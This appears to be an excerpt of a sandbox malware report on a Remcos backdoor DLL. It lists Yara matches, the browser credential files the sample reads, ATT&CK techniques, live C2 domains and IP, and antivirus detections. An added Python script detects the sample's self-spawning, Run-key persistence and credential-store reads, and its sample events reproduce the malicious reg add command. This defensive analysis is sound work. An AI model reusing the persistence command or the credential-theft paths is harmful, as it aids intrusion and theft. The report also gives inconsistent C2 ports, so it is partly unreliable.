              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 12_2_02B0BA12
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 15_2_02A0BA12
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: \key3.db | 12_2_02B0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: \key3.db | 15_2_02A0BB30
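The process-creation, Run-key and network-connect entries in the HIPS / PFW section above (rundll32.exe and regsvr32.exe re-spawning themselves with no arguments, reg.exe adding a Run value named "*Chrome" that relaunches a DLL through rundll32, and rundll32.exe connecting to 193.233.18.18 on port 5140) and the credential-store paths just above (Chrome's Login Data, a Firefox profile's key3.db) describe behaviour that is cheap to detect from endpoint telemetry. The following Python is an added example, not part of the Joe Sandbox report or of any vendor rule set: it encodes those observations as four rules and runs them over a constructed event list. Event field names follow Sysmon's (Image, CommandLine, ParentImage, DestinationIp, DestinationPort, TargetFilename); the event values are made up to mirror the report's process tree; and the file-read events are assumed to come from object-access auditing or an EDR, since Sysmon itself logs file creation rather than reads. The Firefox key4.db and logins.json names are added as the newer equivalents of key3.db, not something the report mentions.

```python
"""Rule-based triage of endpoint events for the Remcos behaviours listed in this report.
Added example: field names mimic Sysmon's and every sample event below is constructed."""
import ipaddress
import re
from dataclasses import dataclass, field

LOLBINS = {"rundll32.exe", "regsvr32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Stores named in the report (Chrome "Login Data", Firefox key3.db) plus newer equivalents.
CRED_STORES = [
    re.compile(r"\\appdata\\local\\google\\chrome\\user data\\[^\\]+\\login data$"),
    re.compile(r"\\appdata\\roaming\\mozilla\\firefox\\profiles\\[^\\]+\\(key3\.db|key4\.db|logins\.json)$"),
]
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?$", re.I)
REG_ADD = re.compile(r'reg(?:\.exe)?\s+add\s+"?(?P<key>[^"]+?)"?\s+/v\s+"?(?P<name>[^"]+?)"?\s.*?'
                     r'/d\s+"?(?P<data>.+?)"?\s+/f', re.I)

@dataclass
class Event:
    kind: str                              # "process" | "network" | "file"
    image: str                             # full path of the acting process
    fields: dict = field(default_factory=dict)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_lolbin_no_args(ev):
    """rundll32/regsvr32 started with a bare command line (the hollowed re-spawn)."""
    if ev.kind != "process":
        return None
    exe = basename(ev.image)
    parts = ev.fields.get("CommandLine", "").split()
    if exe in LOLBINS and len(parts) == 1 and basename(parts[0].strip('"')) == exe:
        parent = basename(ev.fields.get("ParentImage", "")) or "?"
        return f"{exe} launched with no arguments by {parent}" + (" (self-spawn)" if parent == exe else "")
    return None

def rule_run_key_persistence(ev):
    """reg.exe writing a Run value whose data relaunches a DLL through rundll32."""
    if ev.kind != "process" or basename(ev.image) != "reg.exe":
        return None
    m = REG_ADD.search(ev.fields.get("CommandLine", ""))
    if not m or not RUN_KEY.search(m.group("key")):
        return None
    name, data = m.group("name"), m.group("data")
    notes = []
    if "rundll32" in data.lower():
        notes.append("data launches a DLL via rundll32")
    if name.startswith("*"):
        notes.append("value name begins with '*'")
    if re.search(r"chrome|edge|firefox|update", name, re.I):
        notes.append("value name impersonates a browser or updater")
    return f"Run key persistence: {name} -> {data} [{'; '.join(notes)}]"

def rule_lolbin_external_connect(ev):
    """rundll32/regsvr32 reaching a public address (the report's 193.233.18.18:5140)."""
    if ev.kind != "network" or basename(ev.image) not in LOLBINS:
        return None
    ip = ipaddress.ip_address(ev.fields["DestinationIp"])
    if not ip.is_global:
        return None
    port = int(ev.fields["DestinationPort"])
    tag = "web port" if port in (80, 443) else "non-standard port"
    return f"{basename(ev.image)} connected to {ip}:{port} ({tag})"

def rule_credential_store_read(ev):
    """A non-browser process opening a browser credential database."""
    if ev.kind != "file" or basename(ev.image) in BROWSERS:
        return None
    target = ev.fields.get("TargetFilename", "")
    if any(p.search(target.lower()) for p in CRED_STORES):
        return f"{basename(ev.image)} read credential store {target}"
    return None

RULES = [rule_lolbin_no_args, rule_run_key_persistence,
         rule_lolbin_external_connect, rule_credential_store_read]

def triage(events):
    """(rule name, message) for every rule that fires, in event order."""
    return [(r.__name__, msg) for ev in events for r in RULES if (msg := r(ev))]

SYS = r"C:\Windows\SysWOW64"
SAMPLE_EVENTS = [  # constructed; values echo the report's process tree, C2 and file paths
    Event("process", SYS + r"\rundll32.exe", {"ParentImage": SYS + r"\cmd.exe",
          "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1'}),
    Event("process", SYS + r"\rundll32.exe", {"ParentImage": SYS + r"\rundll32.exe",
          "CommandLine": '"' + SYS + r'\rundll32.exe"'}),
    Event("process", SYS + r"\regsvr32.exe", {"ParentImage": SYS + r"\regsvr32.exe",
          "CommandLine": '"' + SYS + r'\regsvr32.exe"'}),
    Event("process", SYS + r"\reg.exe", {"ParentImage": SYS + r"\cmd.exe", "CommandLine":
          r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ '
          r'/d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f'}),
    Event("network", SYS + r"\rundll32.exe", {"DestinationIp": "193.233.18.18", "DestinationPort": "5140"}),
    Event("file", SYS + r"\rundll32.exe",
          {"TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"}),
    Event("file", SYS + r"\regsvr32.exe",
          {"TargetFilename": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\key3.db"}),
]

if __name__ == "__main__":
    print(*(f"[{name}] {msg}" for name, msg in triage(SAMPLE_EVENTS)), sep="\n")
```

The first sample event (rundll32.exe launched with the DLL path and ",#1") is a legitimate-looking invocation and fires nothing, which is the point of the bare-command-line rule: what stands out in the report is not rundll32 itself but rundll32 and regsvr32 re-spawning copies of themselves with no arguments, and then being the processes that talk to the C2 and touch the browser databases. The Run-key rule records the three separate reasons the "*Chrome" entry is suspicious so that an analyst can tune them independently; a private or loopback destination (for example 10.0.0.5:445) does not trigger the connection rule, and the browser itself reading its own Login Data does not trigger the credential-store rule.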

              Remote Access Functionality

              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: cmd.exe | 12_2_02B0569A
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: cmd.exe | 15_2_02A0569A
              MITRE ATT&CK Matrix (one line per tactic; entries followed by digits in parentheses are the techniques matched by this report's signatures, with the report's count badges reproduced as printed; the remaining entries are the unmatched cells of the matrix)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
              Execution: Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
              Persistence: DLL Side-Loading (1); Windows Service (1); Registry Run Keys / Startup Folder (11); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
              Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (222); Registry Run Keys / Startup Folder (11); Startup Items; Scheduled Task/Job; At; Cron; Launchd
              Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (222); Regsvr32 (1); Rundll32 (1)
              Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
              Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (2); System Information Discovery (22); Security Software Discovery (12); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1); System Network Connections Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
              Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
              Command and Control: Ingress Tool Transfer (11); Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
              Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1536945, Sample: 7P7cuKWTfN.dll, Startdate: 18/10/2024, Architecture: WINDOWS, Score: 100). The rendered graph is not preserved here; the nodes and edges recoverable from it are listed below.

Contacted hosts: goatratedman.com; extendedbreakfast.com (193.233.18.18, port 4050, local ports 49735 and 49737; REDCOM-AS Redcom Khabarovsk Russia RU, Russian Federation), contacted by rundll32.exe.

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures.

Process tree:
• loaddll32.exe starts cmd.exe, regsvr32.exe, rundll32.exe and 3 other processes
  • cmd.exe starts rundll32.exe, which drops C:\Users\user\AppData\Roaming\VIVA_01.dll (PE32) and starts rundll32.exe and cmd.exe
    • signatures on this rundll32.exe: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 4 other signatures
    • the child rundll32.exe connects to extendedbreakfast.com (System process connects to network (likely due to code injection or exploit))
    • the child cmd.exe starts reg.exe (Creates autostart registry keys with suspicious names) and conhost.exe
  • regsvr32.exe starts regsvr32.exe; signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 2 other signatures
  • rundll32.exe starts rundll32.exe; signature: Injects a PE file into a foreign processes
  • the 3 other processes each start rundll32.exe
• two further top-level rundll32.exe instances each start rundll32.exe, which in turn starts rundll32.exe

Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):
7P7cuKWTfN.dll | 47% | ReversingLabs | Win32.Backdoor.Remcos
7P7cuKWTfN.dll | 100% | Avira | TR/AVI.Remcos.yqazi

Antivirus detection for dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\VIVA_01.dll | 100% | Avira | TR/AVI.Remcos.yqazi
C:\Users\user\AppData\Roaming\VIVA_01.dll | 47% | ReversingLabs | Win32.Backdoor.Remcos
              No Antivirus matches
              No Antivirus matches
URL reputation lookups (Source | Detection | Scanner | Label):
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://www.openssl.org/support/faq.html | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
goatratedman.com | 193.233.18.18 | true | true | - | unknown
extendedbreakfast.com | 193.233.18.18 | true | true | - | unknown
Domains (Name | Malicious | Antivirus Detection | Reputation):
goatratedman.com | true | - | unknown
extendedbreakfast.com | true | - | unknown
URLs found in process memory (Name | Source | Malicious | Antivirus Detection | Reputation). Where the source is a set of process memory dumps, only the process names are kept here; the dump identifiers are omitted.
http://geoplugin.net/json.gp | rundll32.exe, regsvr32.exe | false | URL Reputation: safe | unknown
http://www.openssl.org/support/faq.html..................... | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | - | unknown
http://geoplugin.net/json.gp/C | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | URL Reputation: safe | unknown
http://www.vidsoft.de/xmlns/meetingcontrolprotocol | memory dump of rundll32.exe | false | - | unknown
http://www.gotomeeting.comInetAPI::initializeForG2M()InetAPI::shutdown().. | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | - | unknown
http://support.gotomeeting.com/ics/support/default.asp?deptID=5641&task=knowledge&questionID=4517Lea | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | - | unknown
http://www.openssl.org/support/faq.html | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | URL Reputation: safe | unknown
